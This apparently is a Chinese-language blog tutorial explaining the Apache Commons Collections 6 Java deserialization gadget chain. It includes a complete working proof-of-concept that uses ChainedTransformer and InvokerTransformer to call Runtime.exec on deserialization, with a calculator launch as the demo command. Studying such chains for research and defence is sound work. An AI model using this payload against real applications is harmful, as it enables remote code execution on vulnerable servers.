CommonsCollections6链详解

N1Rvana included in Java

2024-01-15 About 300 words 2 minutes - views

Contents

世界上最好用的 CC 链

CommonsCollections6 详解

CommonsCollections1 的链子调用了LazyMap类中的transform()方法，于是找一个任意类调用get()方法的地方，这里换到了TideMapEntry类

这里的hashCode()方法里调用了getValue()方法里面调用了get()方法，并且map可控，这里的hashCode()很熟悉，因为在URLDNS链中HashMap类里的readObject()方法调用到了hashCode()方法

于是构造poc

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58


package org.example.CommonsCollections;    
    
import org.apache.commons.collections.Transformer;    
import org.apache.commons.collections.functors.ChainedTransformer;    
import org.apache.commons.collections.functors.ConstantTransformer;    
import org.apache.commons.collections.functors.InvokerTransformer;    
import org.apache.commons.collections.keyvalue.TiedMapEntry;    
import org.apache.commons.collections.map.LazyMap;    
    
import java.io.FileInputStream;    
import java.io.FileOutputStream;    
import java.io.ObjectInputStream;    
import java.io.ObjectOutputStream;    
import java.lang.reflect.Field;    
import java.util.HashMap;    
import java.util.Map;    
    
public class CommonsCollections6 {    
    public static void main(String[] args) throws Exception{    
    
    
        Transformer[] transformers = new Transformer[]{    
                new ConstantTransformer(Runtime.class),    
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),    
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),    
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"})    
        };    
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);    
    
        HashMap<Object, Object> map = new HashMap<>();    
        Map<Object, Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));    
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, "test");    
    
        HashMap<Object, Object> map2 = new HashMap<>();    
        map2.put(tiedMapEntry,"test1");    
    
        lazymap.remove("test");    
    
        Class c = LazyMap.class;    
        Field factoryField = c.getDeclaredField("factory");    
        factoryField.setAccessible(true);    
        factoryField.set(lazymap,chainedTransformer);    
        //serialize(map2);    
        unserialize("ser.bin");    
    
    }    
    public static void serialize(Object obj) throws Exception{    
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));    
        oos.writeObject(obj);    
    }    
    
    public static Object unserialize(String filename) throws Exception{    
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));    
        Object obj = ois.readObject();    
        return obj;    
    
    }    
}  